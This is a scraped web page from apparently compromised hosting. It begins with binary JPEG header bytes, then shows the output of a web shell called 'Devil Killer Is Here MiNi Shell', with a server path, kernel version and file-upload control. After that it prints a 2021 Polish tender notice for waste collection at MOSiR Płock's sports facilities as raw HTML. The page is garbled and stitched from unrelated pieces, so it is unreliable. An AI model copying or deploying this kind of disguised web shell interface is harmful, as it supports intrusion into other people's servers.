JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210726/0012671101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00126711 z dnia 2021-07-26</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> "Usługa odbioru odpadów komunalnych z obiektów MOSiR Płock Sp. z o.o. wraz z dostarczeniem pojemników na odpady". </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Sportu i Rekreacji Płock Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 366071611</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Celebry Papieskiej 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Płock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 367 26 92</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mosirplock.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">mosirplock.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Spółka z ograniczoną odpowiedzialnością </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> działalność obiektów sportowych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> "Usługa odbioru odpadów komunalnych z obiektów MOSiR Płock Sp. z o.o. wraz z dostarczeniem pojemników na odpady". </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d7f16e0c-edfb-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00126711</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.mosirplock.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem dedykowanych formularzy dostępnych na ePUAP (www.epuap.gov.pl) oraz udostępnionych przez miniPortal (www.miniportal.uzp.gov.pl). <br/>2. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują <br/>się numerem niniejszego postępowania (MOSiR 6/2021). <br/>3. Oferty i oświadczenia, o którym mowa w art. 125 ust. 1 Ustawy Pzp składa <br/>się, pod rygorem nieważności, w formie elektronicznej, lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>4. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, na adres e-mail: zamowienia@mosirplock.pl, szczególnie <br/>w zakresie przekazywania oświadczeń, wniosków, zawiadomień, wyjaśnień, wezwań do złożenia dokumentów oraz innych informacji. <br/>5. Adres strony internetowej zamawiającego www.mosirplock.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Dokumenty sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach pdf, doc, docx, odt.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Miejski Ośrodek Sportu i Rekreacji Płock Sp. z o.o. jako Zamawiający w niniejszym postępowaniu, zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuje, że:<br/>1)	administratorem danych osobowych osób uczestniczących w niniejszym postępowaniu jest Miejski Ośrodek Sportu i Rekreacji Płock Sp. z o.o., 09-400 Płock, Pl. Celebry Papieskiej 1;<br/>2)	inspektorem ochrony danych osobowych w Miejskim Ośrodku Sportu i Rekreacji Płock Sp. z o.o. jest Pan Sławomir Mańkowski, kontakt: adres e-mai: iod@mosirplock.pl, tel. 692 905 238;<br/>3)	dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Usługa odbioru odpadów komunalnych z obiektów MOSiR Płock Sp. z o.o. wraz<br/> z dostarczeniem pojemników na odpady” prowadzonym w trybie podstawowym bez negocjacji,<br/>4)	odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia <br/>11 września 2019 r.– Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 ze zm.), dalej „Ustawa Pzp”,<br/>5)	dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, <br/>6)	obowiązek podania przez osobę fizyczną, biorącą udział w niniejszym postępowaniu, danych osobowych dotyczących bezpośrednio tej Osoby, <br/>jest wymogiem ustawowym wynikającym z określonych przepisów Ustawy Pzp, związanym z udziałem tej osoby w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Ustawy Pzp,<br/>7)	w odniesieniu do otrzymanych w toku postępowania danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO,<br/>8)	Osoba, podająca w prowadzonym postępowaniu swoje dane osobowe posiada:<br/>a)	na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych,<br/>b)	na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych,<br/>Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp <br/>oraz nie może naruszać integralności protokołu oraz jego załączników,<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania swoich danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego oraz przypadków, <br/>o których mowa w art. 18 ust. 2 RODO. <br/>Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania <br/>w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, <br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej <br/>lub państwa członkowskiego,<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych dotyczących tej Osoby narusza przepisy RODO,<br/>9)	Osobie, podającej swoje dane osobowe nie przysługuje:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych <br/>w niniejszym postępowaniu jest art. 6 ust. 1 lit. c RODO („przetwarzanie <br/>jest niezbędne do wypełnienia obowiązku prawnego ciążącego <br/>na administratorze”).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MOSiR 6/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamówienie obejmuje:<br/>1) nieodpłatne wyposażenie każdego obiektu, objętego niniejszym zamówieniem, w pojemniki, służące do zbierania odpadów komunalnych; pojemniki na odpady powinny zostać dostarczone najpóźniej do dnia 31 sierpnia 2021 roku i muszą spełniać wymóg zgodności z obowiązującymi w tym zakresie polskimi normami,<br/>a)	przewidywana/minimalna liczba pojemników do dostarczenia przez Wykonawcę, z napisem ODPADY ZMIESZANE:<br/>■	kontener o pojemności 7 m3 – 2 sztuki<br/>■	pojemniki o pojemności 1100 litrów – 9 sztuk<br/>■	pojemniki o pojemności 240 litrów – 1 sztuka<br/>b)	przewidywana/minimalna liczba wyposażenia obiektów w pojemniki na odpady selektywnie zebrane, w zależności od rodzaju odpadu:<br/>- pojemniki z napisem: METALE I TWORZYWA SZTUCZNE:<br/>■	pojemniki o pojemności 1100 litrów – 9 sztuk,<br/>■	pojemniki o pojemności 240 Iitrów – 2 sztuki,<br/>- pojemniki z napisem SZKŁO:<br/>■	pojemniki o pojemności 1100 Iitrów – 2 sztuki,<br/>■	pojemniki o pojemności 240 Iitrów – 3 sztuki,<br/>■	pojemniki o pojemności 120 litrów – 4 sztuki,<br/>- pojemniki z napisem PAPIER:<br/>■	pojemniki o pojemności 1100 litrów – 3 sztuki,<br/>■	pojemniki o pojemności 770 litrów – 1 sztuka,<br/>■	pojemniki o pojemności 240 Iitrów – 2 sztuki,<br/>■	pojemniki o pojemności 120 litrów – 2 sztuka.<br/>2) odbiór oraz transport odpadów komunalnych niesegregowanych (zmieszanych), odpadów segregowanych, w tym m.in. do:<br/>a)	opróżniania i wywozu odpadów komunalnych z pojemników umieszczonych we wskazanych obiektach, zgodnie z częstotliwością podaną w tabeli;<br/>b)	sprzątania odpadów, które wysypały się podczas opróżniania pojemników - pojazdy muszą być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników;<br/>3)	przygotowanie harmonogramu wywozu i przekazania go Zamawiającemu najpóźniej 5 dni przed podpisaniem umowy; z zastrzeżeniem:<br/>a)	możliwości wystąpienia konieczności przystąpienia do wywozu odpadów komunalnych, poza ustalonym harmonogramem, w cenach jednostkowych wskazanych w ofercie Wykonawcy. Wykonawca przystąpi do dodatkowego wywozu w ciągu trzech dni od zgłoszenia - zgłoszenie może wpłynąć telefonicznie lub za pośrednictwem poczty e-mail;<br/>b)	w okresie od 15 czerwca 2022 r. do 31 sierpnia 2022 r. odbiór odpadów obejmuje także Kąpielisko SOBÓTKA, znajdujące się w Płocku, przy ul. Parowej. Wywóz odpadów komunalnych będzie następował po mailowym zgłoszeniu konieczności wywozu przez Zamawiającego, w ciągu trzech dni od zgłoszenia, nie licząc dni ustawowo wolnych od pracy. Opróżnienie pojemników z odpadów na Kąpielisku SOBÓTKA odbywać się będzie minimum raz w miesiącu. <br/>c)	możliwości zmiany częstotliwości wywozu odpadów oraz liczby użytkowanych pojemników stosownie do bieżących potrzeb. Zamawiający może zrezygnować z zaplanowanych w harmonogramie wywozów a także zlecić dodatkowe wywozy - zgodnie z lit. a) powyżej. Wszelkie niezbędne informacje o zmianach będą przekazywane najpóźniej na trzy dni przed planowanym terminem odbioru odpadów - zgłoszenie może wpłynąć telefonicznie lub za pomocą poczty e-mail. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90511000-2 - Usługi wywozu odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena - 100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Wg kolejności </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu na podstawie przepisów art. 108-111 Ustawy Pzp, <br/>2)	spełniają warunki udziału w postępowaniu, określone przez Zamawiającego.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki: <br/>1)	posiadają zdolności do występowania w obrocie gospodarczym – w tym zakresie Zamawiający wymaga aby Wykonawcy prowadzący działalność gospodarcza lub zawodową byli wpisani do jednego z rejestrów zawodowych <br/>lub handlowych i innych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania,<br/>2)	posiadają uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – <br/>a)	posiadają wpis do rejestru działalności regulowanej, prowadzonej przez Prezydenta Miasta Płocka, zgodnie z przepisami ustawy o utrzymaniu czystości i porządku w gminach (t.j. Dz.U. z 2021, poz. 888) oraz<br/>b) posiadają wpis do rejestru firm, o którym mowa w art. 49 ustawy z dnia <br/>14 grudnia 2012 r. o odpadach (t.j. Dz.U. z 2021, poz. 779) w zakresie transportu, <br/>3)	pozostają w sytuacji ekonomicznej lub finansowej pozwalającej <br/>na realizację zamówienia – w tym zakresie Zamawiający wymaga <br/>aby Wykonawca - posiadał ubezpieczenie odpowiedzialności cywilnej (OC) <br/>w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia, <br/>na sumę gwarancyjną w odniesieniu do jednego oraz wszystkich zdarzeń <br/>w okresie ubezpieczenia, których skutki są objęte umową ubezpieczenia OC, w wysokości co najmniej 100 tys. zł; OC powinno obowiązywać przez cały okres realizacji niniejszego zamówienia,<br/>4)	posiadają zdolności techniczne lub zawodowe – posiadają doświadczenie <br/>do wykonania zamówienia, tj. w okresie ostatnich pięciu lat przed terminem składania ofert, wykonali w sposób należyty co najmniej jedną usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia przez okres minimum <br/>10 miesięcy o wartości zamówienia nie niższej od 65.000,00 zł brutto i otrzymali referencje od podmiotów, dla których świadczyli usługę<br/> na dowód czego Wykonawca załączy do oferty kopie referencji otrzymanych <br/>od podmiotów na rzecz których usługa była świadczona lub kopie protokołów odbioru należycie wykonanych prac – potwierdzone za zgodność z oryginałem.<br/>UWAGA:<br/>referencji nie muszą składać Wykonawcy, którzy w okresie ostatnich pięciu lat przed terminem składania ofert, zrealizowali w sposób należyty, tj. bez uwag Zamawiającego i bez stosowania kar umownych, zamówienie dot. usługi odbioru <br/>oraz zagospodarowania odpadów komunalnych z obiektów MOSiR Płock Sp. z o.o. wraz z dostarczeniem pojemników na odpady dla Zamawiającego, tj. MOSiR Płock Sp. z o.o., pl. Celebry Papieskiej 1. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy w dniach 16 lutego 2007 r o ochronie konkurencji <br/>i konsumentów (Dz.U. z 2021 r. poz. 275 t.j.) z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca, którego oferta została najwyżej oceniona, zostanie przez Zamawiającego wezwany do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych, aktualnych na dzień złożenia:<br/>1)	potwierdzenie posiadania zdolności do występowania w obrocie gospodarczym, (o którym mowa w R. V ust. 2 pkt 1 SWZ) – w tym celu Wykonawca prowadzący działalność gospodarczą lub zawodową, zobowiązany jest przedłożyć dokument potwierdzający, że jest wpisany do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju lub za granicą (np. KRS, CEIDG), w którym Wykonawca ma siedzibę lub miejsce zamieszkania – wystawiony nie wcześniej niż 6 miesięcy przed jego złożeniem;<br/>UWAGA: <br/>Zamawiający nie wzywa Wykonawcy do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskaże w oświadczeniu, o którym mowa <br/>w R. VII ust. 1 pkt 2) SWZ, dane umożliwiające dostęp do tych baz i potwierdzi aktualność danych zawartych w tych bazach;<br/>2)	Potwierdzenie sytuacji ekonomicznej lub finansowej, o której mowa <br/>w R. V ust. 2 pkt 3) SWZ: w tym celu Wykonawca zobowiązany jest przedłożyć:<br/>	dokument potwierdzający, że Wykonawca jest ubezpieczony <br/>od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, że wskazaniem sumy gwarancyjnej tego ubezpieczenia, która nie może być niższa niż wskazana przez Zamawiającego <br/>(100 tys. zł);<br/>3)	Potwierdzenie zdolności technicznej lub zawodowej, o której mowa <br/>w R. V ust. 2 pkt 4), w tym celu Wykonawca zobowiązany jest przedłożyć: <br/>wykaz usług, wykonanych lub wykonywanych, w okresie ostatnich 3 lat, <br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, <br/>wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, wraz z załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, <br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. (wykaz usług – załącznik nr 7 do SWZ).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Inne dokumenty dołączane do oferty:<br/>1)	pełnomocnictwo /oryginał/ lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy przez osobę lub osoby podpisujące ofertę - jeżeli uprawnienie do podpisu nie wynika bezpośrednio z zapisu w Krajowym Rejestrze Sądowym lub w Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innym właściwym rejestrze,<br/>2) pełnomocnictwo /oryginał/ osoby/osób reprezentujących podmioty udostępniające zasoby – zgodnie ze wskazaniem pkt 1. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o 